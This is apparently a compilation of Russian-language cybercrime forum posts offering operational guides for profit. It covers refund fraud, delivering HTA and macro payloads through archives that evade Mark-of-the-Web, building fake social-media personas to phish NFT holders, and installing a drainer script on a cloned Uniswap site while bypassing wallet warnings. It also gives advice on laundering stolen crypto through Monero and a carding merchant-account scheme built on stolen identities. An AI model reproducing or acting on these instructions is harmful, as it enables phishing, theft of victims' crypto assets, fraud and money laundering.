Реф-сервисы : что это и зачем нужны?
До сих пор рабочая тема с обувью
Бизнес на перепродаже рефнутых товаров
Составляем выписку из сервисного центра на примере рефа телефонов.
Трек номер.
Английский язык в общении с саппортами
Сайты, которые хорошо рефают.
Как страховки посылок помогут нам получать рефанд?
Chargeback – Что это такое и как мой друг получил его?
Как регать новые аккаунты для рефов максимально эффективно и быстро?
You must have at least 10 reaction(s) to view the content.
Почему никто на этом форуме не затрагивает такую интересную нишу, как рефанд?
**Привет всем! Ну, что, погнали дальше **
Краткое описание :
Так как данный формат сюда по новостям набирает популярностьтыц, было принято решение показать, как это делается. Из минусов мотву не обходит, но можно через Winrar это сделать. Требует админа, что по мне, так хорошо отшиваем всякий сброд и задротов, но это не точно
**Да как вставить PowerShell или другую нагрузку можно по читать туттыц также, можно прикрутить иконку ну и.т.д да мега код из видео тыц iframe не обязательно использовать можно нагрузку прямой ссылкой ставить \\127.1.1.0\Users\test.hta или file://///127.1.1.0/Users//test.hta ну там вам в помощь SMB или WebDAV.
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail.ru.
cloud.mail.ru
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail.ru.
cloud.mail.ru
**
Краткое описание :
**В данном списке . JS и .CPL вообще нет по умолчанию в Winrar *.exe *.bat *.cmd *.hta *.lnk *.msi *.pif *.ps1 *.scr *.vbs *.doc *.docb *.docm *.docx *.dot *.dotm *.dotx *.ppa *.ppam *.pot *.potm *.potx *.pps *.ppsm *.ppsx *.ppt *.pptm *.pptx *.sldm .sldx .wbk .xls .xlsb .xlsm .xlsx .xlm .xlt .xltm .xltx вы можите ещё посмотреть, чего не добавили Winrar на пример тут [тыц](http://www.hexacorn.com/blog/2019/02/11/file-extensions- of-interest/)[.](http://www.hexacorn.com/blog/2019/02/11/file- extensions-of-interest/)
Да, одно замечание. Многие его не знают. Просто, если на жертве стоит WinRAR до шестой версии, то он не ловит Motw. Также с 7zip. Что это значит? Это значит, что офис может быть и последний, а вот версия WinRAR нет. И макрос пройдет без проблем. Но это так, на заметку[тыц](https://www.win- rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=216&cHash=983dfbcc83fb1b64a5f792891a281709)
](https://cloud.mail.ru/public/xJEV/J6aHCtV42)
Вам открыли доступ к файлу. Отправлено с помощью Облако Mail
cloud.mail.ru
Добрый вечер!
Сегодня я расскажу вам о точечном крипто-трафике.
Все что вы прочитаете основано на моем практическом опыте с апреля.
Тема эта актуальна и за октябрь команда в которой я работаю заработала
$300,000.
На рынке примерно 5 активных команд, оборот которых сопоставим.
Выводы делайте сами, т. к. по этому направлению работают в лучших филиалах
(которые генерируют 90% прибыли) около 100 человек из СНГ, за бугром такой
практики не наблюдаю.
При этом вам не требуется больших финансовых вложений и начать может любой.
**
Что это за трафик и в чем его преимущество?**
Наш трафик будет в основном из Twitter, также возможен Discord, TikTok,
Instagram, Threads и даже почта.
Дело в том что в Twitter (как и в других вышеупомянутых социалках)
развернулось мощное крипто-сообщество, особенно NFT-тематика, они называют
себя Web3.
В этом пространстве очень часто участники ценят анонимность, предпочитают псевдонимы и NFT-аватарки для персонализации и идентификации себя в сообществе. Именно эта особенность открывает для нас возможность проведения финансовой разведки и создания фишинговых компаний направленных на конкретных участников/группы, которые являются для нас привлекательными с точки зрения выгоды.
Широкий простор для разведки нам открывает блокчейн и его прозрачность, а
именно:
- Ethereum Name Service (ENS), т.е. привязка своего крипто-кошелька к
.eth домену и использование его в качестве псевдонима.
- Децентрализованные social media по типуLenster , которые также
ведут нас на .eth, могут содержать электронную почту организации/участника
сообщества, дополнительную информацию по интересам для подготовки фишинговой
компании.
- Торговые площадки, платформы публикации цифрового искусства (музыки,
картин, книг), например OpenSea, sound.xyz и пр.
- Виртуальные мета-вселенные: игры (например Decentraland), виртуальные
галереи, выставки.
Что требуется для начала работы?
1. Аккаунты в Twitter и Discord (минимум), можно создать также
Instagram, TikTok и пр., но в них гораздо сложнее создать и поддерживать
актив, поэтому рекомендую также начать их вести и использовать спустя время
когда они будут достаточно прогреты и готовы к боевым условиям, т.е. не будут
"палить" вас.
Twitter - вам необходимо купить аккаунт. Какой лучше, спросите вы? В
мануалах вы можете встретить информацию о том, что требуется старый аккаунт
2010 - 2012 года, который "добавляет доверия". По этому поводу могу сказать
что во всех NFT-сообществах существует список red flags и сегодня старая
дата регистрации скорее red flag которая может заставить лохматого
провести дополнительную проверку в отношении вас. Слишком свежий акк также
может отпугнуть, поэтому рекомендую 2021-2022 года, имхо будет идеально.
Обязательно покупайте аккаунт который уже активирован по SMS и имеет
привязанный номер, иначе вам придется вязать номер, т.е. потратить
дополнительные деньги + время на подбор номера (фрод Twitter сейчас сильно не
любит виртуальные номера, их придется подбирать под ip, 60% не подойдут) +
получите блокировку на 3 дня, в течении которой не сможете оплатить
необходимую нам подписку Twitter Blue.
Цена такого аккаунта с верифицированным номером не превышает 150 рублей
(сильно завысил с запасом).
После покупки аккаунта не ломимся перевязывать все что можно, велик шанс того что аккаунт отлетит, сделайте это позже, когда ваша сессия будет активна хотя бы 1-2 дня.
Для входа обязательно используйте какой-нибудь отдельный браузер/антик + отдельный прокси, это позволит избежать теневых банов, обеспечит лучшую проходимость ваших сообщений напрямую в ЛС минуя корзину запросов на переписку.
Можно использовать портабельную мозилу или долфин (бесплатно) + прокси (100 рублей).
Когда вы вошли в аккаунт, найдите того кто повесит вам Twitter Blue, можете поискать на нашем/соседнем форуме либо плати ру (не реклама), цена в районе 20$ (~2000 рублей).
Почти все в Web3 используют Discord, поэтому его тоже нужно заиметь.
Более трастово и привлекательно выглядит аккаунт с Nitro , такой можно
купить примерно за 500 рублей с подпиской на 3 месяца. Также старайтесь
выбрать аккаунт с регистрацией в 2021-2022 году.
Для того чтобы выглядеть более деловым и респектабельным также советую
обзавестись корпоративной почтой.
Это также дает доверие. Мануал найдете на нашем форуме. (их полно)
Цена вопроса - домен на год в районе 100 - 1000 рублей (зависит от зоны - .com
дороже, .pro дешевле и тп) + хостинг под почту (обычно у того же регистратора)
100 рублей в месяц.
Итого - набор молодого бойца нам обойдется в 3000 рублей. (30$)
Как по мне очень бюджетно. Вы получаете все что необходимое. Такой набор на
практике даже используют далеко не все)
Как оформить аккаунт в Twitter?
Это пример очень хорошо оформленного аккаунта:
- Большое количество постов(ежедневно вы сможете крутить около 800
постов, в учет идут и репосты и собственные посты), поэтому рекомендую
использовать бота (если найдете такого бота/сервис, который не убьет ваш акк),
я обычно в перерывах сам понемногу кручу, за день как раз набегает, а за месяц
вполне можете сделать 30к на аккаунте. Чем больше - тем лучше.
Рекомендую репостить/лайкать именно NFT-тематику, живых людей. Они часто подписываются на вас и вы убиваете двух зайцев (крутите еще и подписчиков бесплатно) + когда лохматые будут заходить в ваш профиль будут видеть общих подписчиков, что добавит вам хорошего траста с их стороны.
- Подходящая дата регистрации (не стар и не слишком молод)
- Интересное, креативное описание (если не знаете как оформить - очень
простой совет - посмотрите как оформлены настоящие живые люди и просто
сделайте по аналогии, укажите что вы отец двоих дочерей, рыбак, играете на
губной гармошке и все в таком духе, тут все зависит от вашей дальнейшей
легенды, либо это будет деловой профиль, либо неформальный).
- Указан личный сайт - это + к трасту. Можете сделать простейший лендинг
на тильде/чем угодно, что-то вроде вашего портфолио разработчика (тогда
укажите ссылки на гитхаб и т.п.), тут опять таки зависит от легенды. Если лень
делать сайт можете сделатьLinktree - популярный в веб3 инструмент создания
аналога портфолио (коллекция ссылок на ваши другие социалки, проекты и т.п.).
- В данном случае используется NFT-аватар с популярным NFT, такое я НЕ
рекомендую использовать.
Во-первых это легко можно проверить через OpenSea (и у владельца NFT будет
привязан Twitter, что выдаст вас, либо лохматый вообще знает и подписан на
владельца). Во-вторых все больше владельцев NFT сейчас верифицируют их через
Twitter и аватар приобретает шестигранную форму. Но все равно есть 20%
пользователей которые этого не делают, т.к. это доступно только на iPhone.
**Я предлагаю вам следующие варианты решения:
- **Покупаем любой понравившийся дешевый NFT за пару баксов и верифицируем
его. Добавляет хорошего траста. ТАК делают 0.1% мошенников из всех кого я
видел. Вы сразу выделяетесь из толпы фишеров.
- Более сложный вариант, найти на OpenSea аккаунт где БИТАЯ ссылка на
Twitter, т.е. владелец изменил никнейм в Twitter. OpenSea не проверяет их на
актуальность, поэтому мы занимаем его в Twitter, и теперь ВУАЛЯ, ссылка из
OpenSea ведет на ВАШ Twitter, если вы нашли такой профиль обязательно укажите
ссылку на OpenSea в профиле Twitter, поставьте на аватарку любой NFT из тех
что хранится у настоящего холдера. Тот факт что ваш аватар не верифицирован
легко контрится тем что у вас Android + мамонт обязательно перейдет на OpenSea
и попробует перейти по ссылке и попадет на вас.
Если вам удалось ухватить профиль с популярными и дорогими NFT это добавляет
огромного траста для вас. пользуйтесь с умом и не про@бите шанс.
Поверьте мне, таких аккаунтов еще очень много и появляются они часто, просто
нужно иногда посматривать. Даже ТОП коллекции. Я стабильно выхватываю 1-2
таких каждый месяц.
Смотреть сюда. Вот о чем я имею ввиду. Также фишка работает с инстой и другими
социалками которые привязываются, незанятые домены на сайты и т.п.
- Также можете арендовать настоящий .ETH домен, также добавляет траста. И использовать в качестве псевдонима. Стоит также пару баксов на год.
Тут нужно понимать, что не обязательно косить под NFT-энтузиаста, можете создать профиль простого человека, разработчика, HR и т.д. Включаем фантазию!
Аналогичным образом оформляем Discord аккаунт, привязываем к нему Twitter
(чтобы при открытии вела ссылка на Twitter), красивые профили взаимно
усиливают эффект друг от друга. Используйте преимущества Nitro, ставьте
значки, анимированные аватары, фон и т.п.
После оформления профилей обязательно создайте активность в Twitter.
Что она должна содержать?
Вы "нарепостили" много сообщений, но при поиске вас по тегу у вас не будет
собственных постов.
Вы можете:
- Создавать Threads (т.е. создать колонку из сообщений на определенную тему),
сгенерировав как рерайт через ChatGPT либо создать через ChatGPT что-то свое,
сделать перевод какого-то материала и т.п., разместив свою колонку. Ведения
своих Threads - то что также делают далеко не все фишеры, и это также выделит
вас в удачном свете. О чем можно создать Threads? Свой взгляд на медвежий
рынок/бычку и т.п., взгляд на рост/прогноз относительно какой-либо крипты,
нашумевшей темы в Web3, протокола и т.п.
- Создавать свои Life Moments, фотографии еды, фотографии автомобиля, ваш
отчет с барберкю. Все должно быть в единой концепции, укладываться в вашу
таймзону. Креативьте.
- Наполняйте ленту GM и GN постами - актуальный в Web3 тренд приветствовать
друг друга утром и прощаться вечером желая спокойной ночи, делясь планами на
день и итогами дня в конце. Те же самые лайф моментс.
- Наполняйте вашу галерею (она видна), т.е. постите мемы на актуальные в
Web3/политические темы (тут будьте осторожны чтобы не спугнуть мамонта вызвав
неприязнь, не нужно шутить про землетрясение и т.п.).
Речь идет об этом блоке, туда автоматически летит прикрепленная медия.
В качестве классного элемента можете собрать коллаж из 6 изображений (как
мозайку, пазл), поддерживая какой-то тренд. Как пример.
Для своего профиля вы можете создать кастомный баннер который будет вести на
соц. сети (теги), отражать вашу корп. почту и сайт.
Это также выглядит круто и отличает вас от остальных и добавляет траста.
Например, если вы разработчик, сделайте зашифрованное послание, если вы тестировщик - сделайте что-нибудь в стиле киберпанка и т.п.
Когда ваши профили готовы и оформлены, вы можете начинать разведку!
Давайте искать жир!
Как это делать? Когда задаюсь этим вопросом голова начинает взрываться и кажется, что даже не хватит вечности описать все способы поиска и пробива в Web3.
Покажу вам пример поиска и раскрутки/сбора инфы.
1. Нестареющая классика или "площадки вы@баны и задр@чены".
Когда я только начинал работать я слышал что популярные площадки "убиты", что
из них все "выжато".
Увы и ах всем неудачникам! Это не так! Площадки невозможно убить! Просто вам
лень менять подход!
Первый профит я сделал именно на самой убитой площадке!
Речь идет об **
![opensea.io](/proxy.php?image=https%3A%2F%2Fstatic.opensea.io%2Fog- images%2FMetadata- Image.png&hash=448cd0b42643db47b6d1f46b194f3fc8&return_error=1)
A gas-free marketplace for NFTs on Polygon. Create, buy, sell, and auction NFTs on the Polygon blockchain without paying any gas fees. Browse popular no- gas fees NFTs.
opensea.io
**
Когда вы заходите на самую популярную площадку вас встречает интерфейс, где вы
можете делать поиск среди всех NFT, среди коллекций, фильтровать их по
множеству признаков. Если мы начнем разбирать функционал это займет слишком
много времени - попробуйте, я думаю вам хватит и 30 минут чтобы разобраться в
навигации. Я остановлюсь лишь на основных моментах и примерных сценариях
работы.
- Работаем по трендовым коллекциям (что-то свежее) (Trending)
- Работаем по топовым коллекциям (Top) (что-то что долбят все вокруг!)
- Ищем свежие дропы (Drops) - т.е. можно выбрать какой-либо блокчейн и в
режиме реального времени смотреть что публикуют прямо сейчас, велик шанс найти
молодых художников, которые что-то минтят (выпускают), тут будет много ботов
топ коллекций и всяких фейков которые буквально не дают вам изучать ленту
бесконечно обновляя ее, но если у вас достаточно терпения тут вы можете найти
свеженьких художников которые точно имеют немного баксов, т.к. им необходимо
оплатить комиссию за чеканку НФТ!!! Тут я и поймал свой первый профит на 500$.
Как вы видите вы можете фильтровать типы цифрового искусства (музыка, рисунки,
PFP, игровые предметы и т.п.)
Также можете выбрать блокчейн, я рекомендую выбирать именно Ethereum и
совместимые с ним блокчейны, блокчейны которые имеют мосты с эфиром (откуда мы
сможем легко все вывести).
Открыв нужную коллекцию вы также можете отфильтровать ее:
Когда мы были совсем юнцы в этом деле, мы фильтровали от дешевых к дорогим и
старались как планктон откусывать какие-то огрызки. Когда мы заматерели и
стали уверенно вести диалоги мы стали наглее и богаче, мы стали смелыми, стали
брать бест офферы (прямо сейчас кто-то готов отвалить много денег за NFT, а
значит в случае кражи мы моментально получим эти бабки к себе на счет), стали
брать самые дорогие NFT!
И если вы думаете что это невозможно, вы так и будете так думать. Посмотрите
алерты в Twitter, каждый день кто-то лишает панков, обезьян и т.п., а это
очень дорогие и топовые NFT порой на несколько сотен тысяч $$$$!!!
Открыв любую NFT вы можете увидеть ее владельца (в данном случае мы
рассматриваем работу по холдерам)
Провалившись мы можем увидеть следующую инфу:
- Псевдоним на OpenSea (в случае отстутствия другой инфы можем сделать
простой пробив других социалок, например Twitter и Discord)
- .eth домен (может быть ником Twitter, может быть привязан к Web3
децентрализованным Social Media типо Lenster), также ведет нас на кошелек.
- Видим в данном случае Тег (может совпасть например с Instagram или
Telegram, которые могут быть не привязаны)
- Также видим привязанный Twitter
Собирая этот объем информации начинаем с ним работать! Углубляясь глубже и
раскатывая их.
Вся эта информация полезна и очень важна для составления портрета перед атакой
Также обратите внимание на NFT, если вдруг у вас не получилось найти никакую инфу/либо инфа не привязана, часто в Twitter человек мог указать в описании профиля чем он владеет, например "MAYC #1337", что позволит нам найти его учетку через поиск!
В данном случае мы имеем очень много инфы. Также я выбрал человека из ТОП коллекции, у таких я обычно даже не проверяю баланс (а зачем, он там точно есть, либо мы точно продадим NFT и выручим много бабок).
Но если вы делаете разведку через другие источники, нашли .eth, либо берет непопулярных людей, то пробиваем так:
У нас есть следующие сервисы:
https://debank.com/ проверка баланса в .eth сети и совместимых сетях
https://zapper.xyz/ более удобная оценка NFT-портфеля
https://etherscan.io/ в случае если вы хотите пробить debank, но у вас нет
чистого адреса формата 0x... вы можете заресолвить тут .eth домен и узнать
адрес кошелька.
Рассмотрим Заппер.
Есть Кошелек - это реальная цена токенов в портфеле которые мы можем продать.
Также есть "Чистые активы", которые совсем не чистые. Там учитывается
стоимость NFT, но стоимость владелец может запросить другую, настоящую же
стоимость определяет Best Offer, т.е. сколько прямо сейчас за нее готовы дать
на аукционе, а это число сильно меньше.
В данном случае также мы видим историю транзакций и взаимодействий.
Можем заметить активное пользование Blur, а значит человек скорее всего
трейдит. Немного инфы вам в копилочку.
Как мы видим, человек действительно трейдит. Также видим что у него открыт DM
(очень хорошо).
Как инициировать диалог?
Здесь отталкиваемся от:
- Легенды вашей/в вашем филиале.
- Интересов пользователя.
Можно инициировать знакомство в DM, но по моей практике сейчас это работает
хуже.
Лучше рассмотреть его последние посты по его тегу и найти место его общения,
вклиниться в обсуждение, завести спор и т.п., уже после этого устанавливать
отношение, ставить на прогрев, прозвон и т.п., т.е. уже дальше
заинтересовывать и "кормить" вашим проектом.
Если DM закрыт это особенно актуально!
Многие скажут что такой подход мертв, кто-то скажет что мертв сам Twitter (можно искать прямо там, зачастую так и делают).
Но я скажу вам следующее:
1. Все профили где привязаны социалки и открыты DM - именно им чаще пишут,
именно их собирают боты.
Пишут тем, у кого Twitter, но у многих есть INST, а если привязан только он -
его скорее всего пропустят и не тронут. Вот вам кусочек незаезженной ниши.
2. Работайте через корп. почты, часто можно найти почту художника/студии, завязать общение там.
3. Можно найти сервер в Discord (где сидят холдеры коллекции) и завязать общение там! Discord коллекции на ее главной странице в 99% случаев.
Используйте раздаточные материалы, подходите креативно и успех будет!
К сожалению, голова взрывается и я даже не знаю куда дальше двигаться.
Рассказать очень многое можно.
А именно:
- Непосредственно грамотный прогрев и инициация разговора нестандартными
способами.
- Углубленная разведка (поиск самых редких целей и их контактов)
- Нестандартные способы доставки нагрузки (стиллера), завод на дрейнер
- Дополнительная монетизация лога (пролив с него на дрейнер, правильная
организация пролива)
- Способы массового фишинга посредством кражи Discord серверов (пролив
дрейнер/стиллер)
- Сбор лидов через Twitter Ads и др.
Короче тут тема просто огромная.
Но пока остановлюсь на этом, если вам это интересно, будем развивать крутые
темы. Тут мы не осветили и 3% от всего происходящего пизд@ца!!!)
Всех люблю.Специально для XSS от албанца!
Всем жира!
Spoiler: Дисклеймер
Статья рассчитана на новичков в сфере дрейнаумеющих лить трафик.
Все сервисы использованные в данной статье упомянуты исключительно из личного опыта. Я ни в коем случае не призываю к работе именно с ними
~~© Вы меня постоянно спрашиваете… - кто тебя нахуй спрашивает?~~
Что такое крипто-дрейнер?
Под дрейнером мы подразумеваем вредоносный скрипт, который вшивается в элементы вашего сайта/фишинг сайта* для получения подписи на исполнение транзакций и запуска процесса дрейна (осушения) активов (нативная монета, остальные токены и NFT) с крипто-кошельков.
*фишинг сайт - копия (подделка) оригинального сайта.
Рассмотрим визуально на примере фишинг сайта Uniswap (популярного EVM* DEX** с установленным на нем дрейнером).
*EVM (Ethereum Virtual Machine) - стандарт, который поддерживается эфироподобными сетями.
**DEX (Decentralized Exchange) - децентрализованная биржа, позволяющая
обменивать криптоактивы между пользователями без участия централизованного
звена.
Spoiler: Фишинг копия лендинга Uniswap
На скриншоте выше нас встречает идентичиный оригинальному сайт, но с одним
замечательным свойством:
На нажатия кнопок Connect (в шапке сайта) и Connect wallet привязан вызов
модального окна с дрейнером. Пользователь выбирает нужный ему кошелек, далее
его перебрасывает на подпись вредоносных транзакций. И он лишается своих
активов.
Что потребуется для работы?
~~С помощью которой ты станешь, наконец-то, богатым и уйдешь с завода~~
"Поиск" партнерской программы (дрейнер)
Покупка домена и хостинга
Настройка и установка дрейнера на вашем лендинг
Дикое желание работы и умение пролива трафика
Трудности, которые тебя ждут
~~Или не ждут. И вообще это не трудности. Но, в любуом случае, желаю тебе
успехов в твоих начинаниях, мой читатель~~
*Web3 простыми словами - это общий термин для технологии блокчейна.
Spoiler: Предупреждение от Blockaid
Простыми словами, это красная плашка, на которую трудно не обратить внимания.
Она появляется при коннекте кошелька с нашим дрейнером и пугает (оповещает)
пользователя о том, что если он подпишет транзакции, то у него своруют активы.
Как это убрать! Что же делать?
У топовых партнерских программ уже реализован обход этого мерзкого
предупреждения, но он срабатывает при определенном условии. Чаще всего это
условие наличия N-ой общей суммы активов на кошельке пользователя. Далее, по
статье, я покажу как работает обход.
Spoiler: Предупреждение о фишинге
Полезная информация на эту тему лежит в /threads/75433
Из личного опыта, советую проливать только на сабдомены.
Особенности работы с дрейнерами
Чаще всего партнерские программы используют автоматическое распределение спизженных активов. То есть при дрейне, ваша доля и доля партнерской программы будет автоматически распределена по вашим кошелькам.
Если при подключении к дрейнеру пользователь подписал аппрув* на трату токенов, то мы можем снимать подписанные токены по мере их поступления.
*Подписал аппрув, то есть дал разрешение
Как я могу проверить, получили ли мы аппрув с пользователя?
Ссылка для проверки аппрувов в сети Ethereum:
https://etherscan.io/tokenapprovalchecker
Spoiler: Проверка аппрува
Как мы видим, некий бедолага с адресом
0x4cfe7bb72e0b7af925bf78d1912cb50db6c3fe63 дал аппрув на безлимитное списание
токена USDC.
При поступлении на его кошелек активов в USDC - их можно будет списать вручную
или в автоматическом режиме, при накоплении заданной суммы* до тех пор, пока
пользователь не отзовет** разрешение на списание.
*Уточните у своей партнерской программы о возможности автоматического списания аппрувнутых активов
**Отзыв аппрува выполняется на этой же странице кнопкой "Revoke"
Ссылки для проверки аппрувов в любых других сетях аналогичны:
https://bscscan.com/tokenapprovalchecker
https://optimistic.etherscan.io/tokenapprovalchecker
https://arbiscan.io/tokenapprovalchecker
И так далее, по аналогии network.com/tokenapprovalchecker
Подготовка и настройка окружения для работы
~~© Анонимности не существует~~
А может Whonix?
Рассмотрим базовую подготовку вашего рабочего места на примере Whonix
(дистрибутив Linux на основе Debian).
За нас уже все рассмотрели в статье /threads/54947 ~~мы ничего не будет
рассматривать~~
Если вам не принципиальна работа на Windows, то в статье выше можно пропустить пункт с установкой Windows. И переходить сразу на Workstation (если вы прошли инструкцию по установке и обновлению).
После того, как мы все установили и настроили нам потребуется коннект с нашей партнерской программой. Где они обитают? Конечно же в небезызвестном мессенджере.
Как зарегистрировать Telegram аккаунт?
Вариантов у нас несколько.
Вариант первый: покупка готового аккаунта (tdata)
Второй вариант: регистрация с собственного телефона (да уж)
Третий вариант: регистрация через эмулятор
Подробности обо всех этих вариантах мы можем найти тут - /threads/107102
Telegram частенько вылетает. Я думаю вы это понимаете. И если вы, например, приобретали tdata с дальнейшим импортом или регистрировали аккаунт на одноразовый номер - то у вас проблемы. Если ваш аккаунт вылетит заново доступ к нему вы уже не получите.
Поэтому предлагаю четвертый вариант: сохранить надежность своего номера ~~и анонимность~~ можно долгосрочно арендовав номер для приема своих СМС. Например, свежеприбывший сервис Virtualsim (/threads/11136) предоставляет аренду номера на год и более с оплатой в криптовалютах. То есть, вам не придется переживать по поводу регистрации. И если ваш аккаунт вылетит, то вам его восстановят, так как номер находится во владении сервиса.
Следует обратить внимание, что нужно обязательно устанавливать 2FA после покупки аккаунта и сбрасывать активные сессии. Надеюсь, объяснять почему - не нужно.
Как создать EVM кошелек для выплат?
Для получения активов, которые вы надрейните (я надеюсь) потребуется адрес
кошелька, как ни странно
И самый простой способ, для новичка, это внутри нашего рабочего окружения установить Chrome браузер и натянуть на него браузерное расширение Metamask, в котором есть возможность генерации кошелька. С недавних времен в Tronlink расширении тоже можно подключать EVM кошельки. Так что выбирайте любой. Также на кошелек можно установить мультиподпись (средства будут уходить при подтверждении с нескольких аккаунтов), если вы переживаете, что создали кошелек через х#й пойми что (но мы сейчас не об этом).
Учитывайте тот факт, что некоторые смарт контракты имеют функцию блокировки
ваших токенов (например USDT). Надеюсь вы догадались:
После получения активов подверженных блокировкам нужно от них избавиться
(обменять) как можно скорей - об этом мы поговорим в последнем разделе. (и
переложим нашу головную боль)
Настройка лендинга и установка дрейнера
~~И выбор партнерской программы дрейнера~~
И так. Для работы у нас почти все готово.
Что нам осталось, по пунктам:
1. Покупка домена и хостинга
2. Компиляция дрейнера
3. Создание фишингового сайта
4. Установка дрейнера на фишинговый сайт
5. "Боевой" тест
Какую партнерскую программу дрейнера использовать?
~~Их множество~~ выбирайте на свой вкус и цвет
Но сейчас мы рассмотрим партнерскую программу, которая успешно работает и
находится прямо на нашем форуме. Здорово, не правда ли?
После того, как вы связались с саппортом у вас появляется активная миссия. Она достаточно простая, вы справитесь. Вам нужно создать свою группу в Telegram и добавить всех саппортов и ботов (которых нужно наделить административными правами в группе). После чего вы делитесь адресом своего EVM кошелька и получаете долгожданный доступ к панели и все причитающиеся инструкции к действию.
Небольшой обзор.
За время моего отсутствия у ребят много что поменялось, в лучшую сторону.
Spoiler: Функции бота
Цены на домены адекватные, а хостинг бесплатный.
Spoiler: Цены на домены внутри бота
Domain Prices:
.com: $15
.xyz: $13
.org: $13
.net: $14
.online: $29
.club: $15
.biz: $18
.dev: $14
.site: $31
.claims: $55
.io: $50
.finance: $49
.app: $16
.live: $27
.in: $9
.click: $11
.info: $20
.co: $27
.eu: $12
.tech: $47
.link: $11
.lol: $3
Думаете это реально? Получается так Мы покупаем домен, загружаемся на хостинг и меняем NS внутри бота.
Веб панель выглядит следующим образом (тут все интуитивно понятно).
Spoiler: Веб панель
Компиляция дрейнера из панели (на каждом шаге компиляции имеется множество настроек, действия которых описаны в панели).
Spoiler: Компиляция
Добавлю, что дрейнер можно скомпилировать прямо из бота.
Компиляция и установка дрейнера на ваш лендинг.
Вы "создали" свой лендинг (скопировали через команду бота, скопировали через
CTRL + S, использовали специальный софт для копирования).
После компиляции вы получили инструкцию, по установке дрейнера.
1. Заходим в папку с нашим лендом и закидываем скомпилированный .js файл в
корень вашего проекта.
2. Подключение скрипта к лендингу.
Заходим в исходный код лендинга и вставляем туда скрипт, который выдал нам
компилятор.
Spoiler: Вставляем скрипт дрейнера из инструкции
3. Привязка дрейнера к элементам.
Все там же, в исходном коде, находим нужны элемент и дописываем через пробел к
нему класс connectButton
Spoiler: Привязываем дрейнер к кнопке
*Если вы скачали/клонировали лендинг из библиотеки бота, то установка скрипта дрейнера не требуется. Он уже будет настроен именно под ваш ID в системе.
4. Заливаем получившийся лендинг на хостинг (предварительно купив домен в
боте или своими силами, но я рекомендую первый вариант)
На покупку домена и установку фишингова сайта на хостинг через бота у меня
ушло не более 10 минут.
Дальше что? Тестируем!
Протестируем свой лендинг, путем подключения вашего кошелька
Если все сделали правильно, то после подключения кошелька в вашу группу придет
уведомление о успешном подключении и дальнейших действиях.
Spoiler: Готовый лендинг с дрейнером
Spoiler: Наш кошелек
Spoiler: Момент подключения кошелька к дрейнеру
Spoiler: Обход Blockaid, вместо красной плашки у нас стандартная рыжая. Плюс списание самого дорогого актива
Spoiler: Подпись транзакции на списание нативного актива
Spoiler: Результат
Spoiler: Лог
Дополнительно, как я указывал выше в статье мы получили аппрув на списание USDC токенов: (узнать количество и посмотреть аппрувнутые кошельки можно через бота)
Spoiler: Полученный аппрув
Бывает так, что кошельки попадаются жирные, но у пользователя активы в USDT и нет нативного токена (комиссии) на проведение транзакции. Вы можете самостоятельно настроить автоматическую отправку нативного токена, достаточного для проведения успешного дрейна. Стоит только импортировать в панель приватный ключ от вашего кошелька (на который вы закинули условно по $20 в каждой сети)
Spoiler: Автотрансфер
© Неужели это законно? - Незаконно это нихрена
Вы великолепны, налили трафика и получили выплату, что дальше?
Повторюсь, что статья рассчитана на новичков в сфере дрейна, но умеющих лить
трафик. Поэтому пути пролива трафика ищем самостоятельно
Схем по отмыву грязных криптоактивов масса.
Оптимальный вариант - использовать любой обменник с форума с хорошей репутацией и/или депозитом.
После того, как вы получили выплату об обменника не стоит сломя голову бежать
и заливать полученное на биржу или обменивать на свою карту в p2p
Будьте терпеливыми.
Советую (по своему опыту) в это цепочку дополнительно добавить несколько
цепочек XMR (Monero).
Для большей безопасности советую не отправлять целые числа при обменах и
цепочках ожидания переводов между XMR - XMR не должна быть мгновенной.
Мы получили такой путь:
Ваши грязные активы - форумный обменник - XMR - XMR - фиат
Если вы решили воспользоваться каким-то обменником, например с мониторинга клирнета, то имейте в виду, что ваши средства могут заблокировать и потребовать от вас обоснование получения средств. И еще до кучи идентификацию вашей личности. Если вас это не остановило и вам заблокировали обмен, то не серчайте. Заблокированные средства возможно восстановить, не не со 100% вероятностью.
Если вас и это не останавливает и вы продолжаете успешно менять свою "грязь" на таких обменниках - то, не забывайте про фингерпринт вашего браузера, по которому отследят все ваши обмены. То есть, если вы пользуясь одним обменником совершили два обмена USDT ERC20 на BTC и потом BTC на USDT TRC20 - то не трудно будет установить связь между всеми вашими обменами и кошельками.
P.S Если у вас есть что добавить/исправить напишите мне, с удовольствием дополню и/или исправлю статью
1. Зачем это тебе вообще нужно?
Это - один из самый быстрых электронных способов реального отмыва через инет картона - и при том на приличные суммы $. (По срокам - 2-5 дней со дня залива пластика в терминал до поступления на твой счет $, сумма в месяц 10к не больше).
Мерчант можно делать на физ и юр лиц
2. Какие проблемы предстоит решить добровольцу
1.Адрес,на которые будут приходить документа
2. Америкосовская LLC (Co.) . Tax-Id на нее.
3. Бизнес счет на LLC (пластик card, чековая книжка void, on-line управление счетом с возможностью переводов $ по миру или управление факсом и по телефону счетом).
4. Телефонный номер с переадресацией на номер, где вы или ваш человек с хорошим английским будет косить под амера. TollFree по ихнему кличат сервис.
5. Понадобиться информация ID о человеке на которого все это дело будет открываться (SSN, DL скан копия с данными этого чела) .
6. Домен зарегистрированный на территории US.
7. Сайт на английском с подробным описанием товаров или услуг которые вы хотите продавать.
8. Выбор реселлера (фирму посредник которая является официальным представителем ауторайза, можно например найти тут http://www.authorizenet.com/agent/directory/show.php3).
9. Собственно пластик (это к Script’у)
10. И остальные подводные камни которые проплывут около твоего Титаника.
Самая главная проблема добровольца - он должен знать о чем идет речь в каждом пункте.
3. Возможности
Возможность №1
Самый долгий и мучительный способ - открывать всё самому.
Можно также заказывать через фирмы, сидящих на предоставление услуг пунктов 0,1,2,3! Такие услуги предоставляют как русские конторы (wfa.ru - ¡Este sitio web está a la venta! - wfa Recursos e información.), так и американские (например http://www.nevada.org). Такая работа займет 3-5 недель (если конторы посредники не кинут на $).
По остальным пунктам помогут за $ с удовольствием ваши знакомые с планеты ... если смотреть глазами форум то можно с удивлением для себя найти людей, кто поможет с пунктами 4,5,6,7. Как только все это готово и ты уже выбрал парней из списка пункта 8, у них на сайте заполняется или скачивается подробная анкета со множеством пунктов, куда и вносится вся та информация которая была собрана (http://www.merchantcreditcard.com/apply.html).
